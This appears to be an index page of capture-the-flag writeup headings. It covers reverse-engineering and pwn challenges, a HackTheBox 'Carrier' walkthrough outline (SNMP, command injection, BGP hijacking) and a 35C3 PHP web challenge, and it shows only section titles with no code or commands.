[Reverse] Dashlame

Statement

Uncompyle

Understanding the script

Resolution

Alternative way using decrypt_archive()

[Pwn] Intergover

Statement

Spotting the vulnerabilty

[Pwn] Signed or unsigned

Statement

Spotting the vulnerability

HackTheBox: Carrier writeup

Table of Contents

Initial Foothold And User Access

Recon

Very SNMP

Lyghtspeed web server

From Command Injection to Reverse Shell

Tickets

Diagnostics

Road to Reverse Shell

Privilege escalation

Network configuration

Network interfaces

BGP configuration

Routing table

Updated network diagram

What’s the plan?

10.120.15.0/24 scanning

10.120.15.1

10.120.15.10

BGP Hijacking

Fake route Advertising

Changing eth2 ip address

Faking an FTP server

Retrieving the flag

Final words

35C3 CTF Writeups

Table of Contents

[Main CTF] Web - php

Solution